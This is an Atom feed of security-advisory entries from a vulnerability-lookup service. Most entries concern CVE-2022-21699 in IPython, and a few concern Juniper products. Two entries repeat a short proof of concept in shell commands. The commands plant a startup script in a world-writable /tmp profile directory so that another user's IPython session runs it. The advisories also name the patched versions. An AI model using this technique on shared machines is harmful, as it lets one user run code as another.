<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-02T17:14:58.699960+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2022-05761</id>
    <title>bdu:2022-05761</title>
    <updated>2026-10-02T17:14:58.798254+00:00</updated>
    <content>bdu:2022-05761</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2022-05761"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/brew-fdroidserver-cve-2022-21699</id>
    <title>BREW-fdroidserver-CVE-2022-21699 — Execution with Unnecessary Privileges in ipython</title>
    <updated>2026-10-02T17:14:58.798289+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Homebrew: fdroidserver</p>
<p>We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
 
Proof of concept</p>
<p>User1:
```
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' &gt; /tmp/profile_default/startup/foo.py
```</p>
<p>User2:
```
cd /tmp
ipython
```</p>
<p>User2 will see:
```
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets
```</p>
<p>## Patched release and documentation</p>
<p>See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,</p>
<p>Version 8.0.1, 7.31.1 for current Python version are recommended. 
Version 7.16.3 has also been published for Python 3.6 users, 
Version 5.11 (source only, 5.x branch on github) for older Python versions.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/brew-fdroidserver-cve-2022-21699"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/certfr-2024-avi-0027</id>
    <title>certfr-2024-avi-0027 — De multiples vulnérabilités ont été découvertes dans les produits
Juniper Networks. Certaines d'entre elles permettent…</title>
    <updated>2026-10-02T17:14:58.798338+00:00</updated>
    <content>certfr-2024-avi-0027</content>
    <link href="https://cve.radiocsirt.org/vuln/certfr-2024-avi-0027"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-232840</id>
    <title>EUVD-2026-232840</title>
    <updated>2026-10-02T17:14:58.798356+00:00</updated>
    <content>EUVD-2026-232840</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-232840"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2022-21699</id>
    <title>fkie_cve-2022-21699</title>
    <updated>2026-10-02T17:14:58.798367+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2022-21699"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-pq7m-3gw7-gq5x</id>
    <title>GHSA-pq7m-3gw7-gq5x — Execution with Unnecessary Privileges in ipython</title>
    <updated>2026-10-02T17:14:58.798388+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: ipython</p>
<p>We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
 
Proof of concept</p>
<p>User1:
```
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' &gt; /tmp/profile_default/startup/foo.py
```</p>
<p>User2:
```
cd /tmp
ipython
```</p>
<p>User2 will see:
```
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets
```</p>
<p>## Patched release and documentation</p>
<p>See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,</p>
<p>Version 8.0.1, 7.31.1 for current Python version are recommended. 
Version 7.16.3 has also been published for Python 3.6 users, 
Version 5.11 (source only, 5.x branch on github) for older Python versions.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-pq7m-3gw7-gq5x"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/gsd-2022-21699</id>
    <title>gsd-2022-21699</title>
    <updated>2026-10-02T17:14:58.798424+00:00</updated>
    <content>gsd-2022-21699</content>
    <link href="https://cve.radiocsirt.org/vuln/gsd-2022-21699"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/msrc_cve-2022-21699</id>
    <title>msrc_CVE-2022-21699 — Execution with Unnecessary Privileges in ipython</title>
    <updated>2026-10-02T17:14:58.798435+00:00</updated>
    <content>msrc_CVE-2022-21699</content>
    <link href="https://cve.radiocsirt.org/vuln/msrc_cve-2022-21699"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/opensuse-su-2022:10043-1</id>
    <title>openSUSE-SU-2022:10043-1 — Security update for python-ipython</title>
    <updated>2026-10-02T17:14:58.798451+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Security update for python-ipython</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/opensuse-su-2022:10043-1"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2022-12</id>
    <title>PYSEC-2022-12</title>
    <updated>2026-10-02T17:14:58.798466+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: ipython</p>
<p>IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2022-12"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2022-21699</id>
    <title>UBUNTU-CVE-2022-21699</title>
    <updated>2026-10-02T17:14:58.798484+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:Pro:14.04:LTS: ipython, Ubuntu:Pro:16.04:LTS: ipython, Ubuntu:Pro:18.04:LTS: ipython, Ubuntu:Pro:20.04:LTS: ipython</p>
<p>IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2022-21699"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2024-0064</id>
    <title>WID-SEC-W-2024-0064 — Juniper Produkte: Mehrere Schwachstellen</title>
    <updated>2026-10-02T17:14:58.798507+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter, lokaler oder physischer Angreifer kann mehrere Schwachstellen in Juniper JUNOS, Juniper JUNOS Evolved, Juniper SRX Series, Juniper EX Series, Juniper QFX Series, Juniper ACX Series, Juniper PTX Series und Juniper MX Series ausnutzen, um beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuführen und seine Berechtigungen zu erweitern.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2024-0064"/>
  </entry>
</feed>
